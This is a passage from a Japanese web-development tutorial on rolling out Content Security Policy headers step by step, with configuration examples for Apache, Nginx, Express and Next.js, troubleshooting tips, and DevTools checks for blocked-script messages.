class=\"wp-block-paragraph\">Report-Only\u30e2\u30fc\u30c9\u3067\u306e\u8abf\u67fb\u304c\u5b8c\u4e86\u3057\u305f\u3089\u3001\u7de9\u3081\u306e\u30dd\u30ea\u30b7\u30fc\u304b\u3089\u672c\u756a\u9069\u7528\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;unsafe-eval&#39; https:;\n  img-src * data:;\n  report-uri https:\/\/example.com\/csp-report;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u3053\u306e\u6bb5\u968e\u3067\u306f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\/\u30b9\u30bf\u30a4\u30eb\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>eval()\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>HTTPS\u306e\u30ea\u30bd\u30fc\u30b9\u3092\u5168\u8a31\u53ef<\/li>\n\n\n\n<li>\u5f15\u304d\u7d9a\u304d\u30ec\u30dd\u30fc\u30c8\u6a5f\u80fd\u3067\u76e3\u8996<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba3: \u30dd\u30ea\u30b7\u30fc\u306e\u6bb5\u968e\u7684\u306a\u53b3\u683c\u5316<\/h3>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u5b89\u5b9a\u7a3c\u50cd\u3092\u78ba\u8a8d\u3057\u305f\u3089\u3001\u5f90\u3005\u306b\u30dd\u30ea\u30b7\u30fc\u3092\u53b3\u683c\u5316\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b9\u30c6\u30c3\u30d71: HTTPS\u3092\u5fc5\u9808\u306b<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>default-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;unsafe-eval&#39;; \/* https: \u3092\u524a\u9664 *\/<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b9\u30c6\u30c3\u30d72: eval()\u3092\u7981\u6b62<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>default-src &#39;self&#39; &#39;unsafe-inline&#39;; \/* &#39;unsafe-eval&#39; \u3092\u524a\u9664 *\/<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b9\u30c6\u30c3\u30d73: \u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u7981\u6b62\uff08nonce\u307e\u305f\u306fhash\u3092\u4f7f\u7528\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>default-src &#39;self&#39;;\nscript-src &#39;self&#39; &#39;nonce-{random}&#39;;\nstyle-src &#39;self&#39; &#39;nonce-{random}&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5404\u30b9\u30c6\u30c3\u30d7\u30671-2\u9031\u9593\u904b\u7528\u3057\u3001\u554f\u984c\u304c\u306a\u3044\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3066\u304b\u3089\u6b21\u306b\u9032\u307f\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba4: \u6700\u7d42\u7684\u306a\u53b3\u683c\u306a\u30dd\u30ea\u30b7\u30fc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7d42\u7684\u306b\u3001\u5fc5\u8981\u6700\u5c0f\u9650\u306e\u8a31\u53ef\u306e\u307f\u3092\u542b\u3080\u30dd\u30ea\u30b7\u30fc\u3092\u9069\u7528\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  
default-src &#39;self&#39;;\n  script-src &#39;self&#39; &#39;nonce-{random}&#39; https:\/\/cdn.example.com;\n  style-src &#39;self&#39; &#39;nonce-{random}&#39;;\n  img-src &#39;self&#39; data: https:;\n  font-src &#39;self&#39; https:\/\/fonts.gstatic.com;\n  connect-src &#39;self&#39; https:\/\/api.example.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;\n  upgrade-insecure-requests;\n  block-all-mixed-content;<\/code><\/pre><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e3b\u8981\u306aWeb\u30b5\u30fc\u30d0\u30fc\u3067\u306eCSP\u8a2d\u5b9a\u65b9\u6cd5<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-1.jpg\" alt=\"\" class=\"wp-image-13263\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-1.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-1-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div 
class=\"c-balloon__text\">\n<p><strong>\u6b21\u306f\u3001\u30b5\u30fc\u30d0\u30fc\u74b0\u5883\u5225\u306eCSP\u8a2d\u5b9a\u65b9\u6cd5\u3092\u7d39\u4ecb\u3059\u308b\u304b\u3089\u3088\u30fc\u304f\u805e\u304f\u3093\u3058\u3083\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u5206\u304b\u308a\u307e\u3057\u305f\uff01\u3088\u308d\u3057\u304f\u304a\u9858\u3044\u3057\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">Apache (.htaccess)<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>&lt;IfModule mod_headers.c&gt;\n  Header set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39; https:\/\/fonts.gstatic.com; connect-src &#39;self&#39;; frame-src &#39;none&#39;; object-src &#39;none&#39;; base-uri &#39;self&#39;; form-action &#39;self&#39;; upgrade-insecure-requests;&quot;\n&lt;\/IfModule&gt;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Nginx<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers 
lang-plain\"><code>server {\n  # \u305d\u306e\u4ed6\u306e\u8a2d\u5b9a...\n\n  add_header Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39; https:\/\/fonts.gstatic.com; connect-src &#39;self&#39;; frame-src &#39;none&#39;; object-src &#39;none&#39;; base-uri &#39;self&#39;; form-action &#39;self&#39;; upgrade-insecure-requests;&quot; always;\n}<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Node.js \/ Express<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>const express = require(&#39;express&#39;);\nconst helmet = require(&#39;helmet&#39;);\n\nconst app = express();\n\n\/\/ helmet\u3092\u4f7f\u7528\u3057\u305f\u8a2d\u5b9a\uff08\u63a8\u5968\uff09\napp.use(\n  helmet.contentSecurityPolicy({\n    directives: {\n      defaultSrc: [&quot;&#39;self&#39;&quot;],\n      scriptSrc: [&quot;&#39;self&#39;&quot;, &quot;https:\/\/cdn.example.com&quot;],\n      styleSrc: [&quot;&#39;self&#39;&quot;, &quot;&#39;unsafe-inline&#39;&quot;],\n      imgSrc: [&quot;&#39;self&#39;&quot;, &quot;data:&quot;, &quot;https:&quot;],\n      fontSrc: [&quot;&#39;self&#39;&quot;, &quot;https:\/\/fonts.gstatic.com&quot;],\n      connectSrc: [&quot;&#39;self&#39;&quot;],\n      frameSrc: [&quot;&#39;none&#39;&quot;],\n      objectSrc: [&quot;&#39;none&#39;&quot;],\n      baseUri: [&quot;&#39;self&#39;&quot;],\n      formAction: [&quot;&#39;self&#39;&quot;],\n      upgradeInsecureRequests: [],\n    },\n  })\n);\n\n\/\/ \u624b\u52d5\u8a2d\u5b9a\u306e\u5834\u5408\napp.use((req, res, next) =&gt; {\n  res.setHeader(\n    &#39;Content-Security-Policy&#39;,\n    &quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com; ...&quot;\n  );\n  next();\n});<\/code><\/pre><\/div>\n\n\n\n<h3 
class=\"wp-block-heading\">Next.js<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>\/\/ next.config.js\nmodule.exports = {\n  async headers() {\n    return [\n      {\n        source: &#39;\/:path*&#39;,\n        headers: [\n          {\n            key: &#39;Content-Security-Policy&#39;,\n            value: &quot;default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-eval&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-src &#39;none&#39;; object-src &#39;none&#39;;&quot;\n          }\n        ]\n      }\n    ]\n  }\n}<\/code><\/pre><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0<\/strong><\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006669.jpg\" alt=\"\" class=\"wp-image-13264\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006669.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006669-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.00.55.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div 
class=\"c-balloon__text\">\n<p><strong>CSP\u3092\u5b9f\u88c5\u3059\u308b\u306b\u3042\u305f\u3063\u3066\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0\u306e\u3053\u3068\u3082\u77e5\u308a\u305f\u3044\u3067\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong><strong><strong>\u3046\u3080\u3002\u3053\u3053\u3067\u306f\u3001\u4e3b\u306a\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0\u30925\u3064\u7d39\u4ecb\u3059\u308b\u305e\u3044\uff01<\/strong><\/strong><\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c1: Google Analytics\u3084Google Tag Manager\u304c\u52d5\u304b\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong>CSP\u5c0e\u5165\u5f8c\u3001\u30a2\u30af\u30bb\u30b9\u89e3\u6790\u304c\u53d6\u5f97\u3067\u304d\u306a\u304f\u306a\u3063\u305f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u539f\u56e0\uff1a<\/strong>Google\u95a2\u9023\u306e\u30c9\u30e1\u30a4\u30f3\u304c\u8a31\u53ef\u3055\u308c\u3066\u3044\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div 
class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  script-src &#39;self&#39; https:\/\/www.googletagmanager.com https:\/\/\nwww.google-analytics.com;\n  img-src &#39;self&#39; https:\/\/www.google-analytics.com https:\/\/\nwww.googletagmanager.com;\n  connect-src &#39;self&#39; https:\/\/www.google-analytics.com https:\/\/\nanalytics.google.com;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c2: \u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u30d6\u30ed\u30c3\u30af\u3055\u308c\u308b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong><code>&lt;script&gt;<\/code>\u30bf\u30b0\u5185\u306eJavaScript\u304c\u5b9f\u884c\u3055\u308c\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u539f\u56e0\uff1a<\/strong>&#8216;unsafe-inline&#8217;\u304c\u8a2d\u5b9a\u3055\u308c\u3066\u3044\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff08\u9078\u629e\u80a2\uff09\uff1a<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd51: nonce\u3092\u4f7f\u7528\uff08\u63a8\u5968\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;!-- \u30b5\u30fc\u30d0\u30fc\u5074\u3067\u30e9\u30f3\u30c0\u30e0\u306anonce\u3092\u751f\u6210 --&gt;\n&lt;script nonce=&quot;abc123&quot;&gt;\n  console.log(&#39;\u8a31\u53ef\u3055\u308c\u305f\u30b9\u30af\u30ea\u30d7\u30c8&#39;);\n&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd52: \u5916\u90e8\u30d5\u30a1\u30a4\u30eb\u5316<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;!-- \u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5916\u90e8\u30d5\u30a1\u30a4\u30eb\u306b\u79fb\u52d5 --&gt;\n&lt;script 
src=&quot;\/js\/app.js&quot;&gt;&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd53: &#8216;unsafe-inline&#8217;\u3092\u8a31\u53ef\uff08\u975e\u63a8\u5968\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>script-src &#39;self&#39; &#39;unsafe-inline&#39;;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c3: CSS\u304c\u9069\u7528\u3055\u308c\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30bf\u30a4\u30eb\u3084style\u5c5e\u6027\u304c\u7121\u52b9\u5316\u3055\u308c\u308b\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>style-src &#39;self&#39; &#39;unsafe-inline&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u307e\u305f\u306f\u3001nonce\u3092\u4f7f\u7528\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-css\" data-lang=\"CSS\"><code>&lt;style nonce=&quot;abc123&quot;&gt;\n  .custom { color: red; }\n&lt;\/style&gt;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c4: iframe\u304c\u8868\u793a\u3055\u308c\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong>YouTube\u306e\u57cb\u3081\u8fbc\u307f\u52d5\u753b\u306a\u3069\u304c\u8868\u793a\u3055\u308c\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>frame-src &#39;self&#39; https:\/\/www.youtube.com https:\/\/player.vimeo.com;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c5: Font Awesome\u3084Google Fonts\u304c\u8aad\u307f\u8fbc\u307e\u308c\u306a\u3044<\/h3>\n\n\n\n<p 
class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>font-src &#39;self&#39; https:\/\/fonts.gstatic.com \nhttps:\/\/cdnjs.cloudflare.com;\nstyle-src &#39;self&#39; https:\/\/fonts.googleapis.com \nhttps:\/\/cdnjs.cloudflare.com;<\/code><\/pre><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CSP\u306e\u30c6\u30b9\u30c8\u3068\u30c7\u30d0\u30c3\u30b0<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006670.jpg\" alt=\"\" class=\"wp-image-13265\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006670.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006670-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading\">Chrome DevTools\u3067\u306e\u78ba\u8a8d\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u9055\u53cd\u306fChrome\u306eConsole\u30bf\u30d6\u306b\u8868\u793a\u3055\u308c\u307e\u3059\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u9055\u53cd\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u4f8b\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Refused to load the script &#39;https:\/\/evil.com\/malicious.js&#39; because it violates the following Content Security Policy directive: &quot;script-src &#39;self&#39;&quot;.<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u78ba\u8a8d\u624b\u9806\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Chrome 
DevTools\u3092\u958b\u304f\uff08F12\u30ad\u30fc\uff09<\/li>\n\n\n\n<li>Console\u30bf\u30d6\u3092\u9078\u629e<\/li>\n\n\n\n<li>\u30da\u30fc\u30b8\u3092\u30ea\u30ed\u30fc\u30c9<\/li>\n\n\n\n<li>CSP\u9055\u53cd\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u78ba\u8a8d<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\u30aa\u30f3\u30e9\u30a4\u30f3\u30c4\u30fc\u30eb<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>1. CSP Evaluator (Google)<\/strong><br><a href=\"https:\/\/csp-evaluator.withgoogle.com\/\">https:\/\/csp-evaluator.withgoogle.com\/<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CSP\u30dd\u30ea\u30b7\u30fc\u306e\u5b89\u5168\u6027\u3092\u8a55\u4fa1<\/li>\n\n\n\n<li>\u8106\u5f31\u6027\u3092\u6307\u6458<\/li>\n\n\n\n<li>\u6539\u5584\u6848\u3092\u63d0\u793a<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>2. Report URI<\/strong><br><a href=\"https:\/\/report-uri.com\/\">https:\/\/report-uri.com\/<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CSP\u9055\u53cd\u30ec\u30dd\u30fc\u30c8\u306e\u53ce\u96c6\u30fb\u5206\u6790\u30b5\u30fc\u30d3\u30b9<\/li>\n\n\n\n<li>\u30c0\u30c3\u30b7\u30e5\u30dc\u30fc\u30c9\u3067\u9055\u53cd\u50be\u5411\u3092\u53ef\u8996\u5316<\/li>\n\n\n\n<li>\u7121\u6599\u30d7\u30e9\u30f3\u3042\u308a<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>3. 
Security Headers<\/strong><br><a href=\"https:\/\/securityheaders.com\/\">https:\/\/securityheaders.com\/<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30d8\u30c3\u30c0\u30fc\u3092\u8a55\u4fa1<\/li>\n\n\n\n<li>CSP\u3092\u542b\u3080\u5404\u7a2e\u30d8\u30c3\u30c0\u30fc\u3092\u30c1\u30a7\u30c3\u30af<\/li>\n\n\n\n<li>\u6539\u5584\u70b9\u3092\u63d0\u6848<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u3001\u601d\u3063\u3066\u305f\u3088\u308a\u3061\u3083\u3093\u3068\u8a2d\u8a08\u3059\u308b\u3082\u306e\u306a\u3093\u3067\u3059\u306d\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div 
class=\"c-balloon__text\">\n<p><strong>\u3046\u3080\u3002CSP\u3092\u7406\u89e3\u3067\u304d\u308c\u3070\u3001<br>\u5b89\u5168\u306aWeb\u30b5\u30a4\u30c8\u3092\u8a2d\u8a08\u3067\u304d\u308b\u30a8\u30f3\u30b8\u30cb\u30a2\u306b\u4e00\u6b69\u8fd1\u3065\u304f\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.06.05.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u307e\u305a\u306fReport-Only\u304b\u3089\u8a66\u3057\u3066\u307f\u307e\u3059\uff01\u3042\u308a\u304c\u3068\u3046\u3054\u3056\u3044\u307e\u3057\u305f\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h2 class=\"wp-block-heading\">\u307e\u3068\u3081<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8a18\u4e8b\u3067\u306f\u3001Content Security Policy (CSP)\u306e\u5b9f\u88c5\u65b9\u6cd5\u306b\u3064\u3044\u3066\u3001\u57fa\u790e\u304b\u3089\u5b9f\u8df5\u307e\u3067\u8a73\u3057\u304f\u89e3\u8aac\u3057\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u91cd\u8981\u306a\u30dd\u30a4\u30f3\u30c8\u306f\u4ee5\u4e0b\u306e\u901a\u308a\u3067\u3059\u3002<\/p>\n\n\n\n<p class=\"is-style-big_icon_point 
<strong>\u30fbCSP">
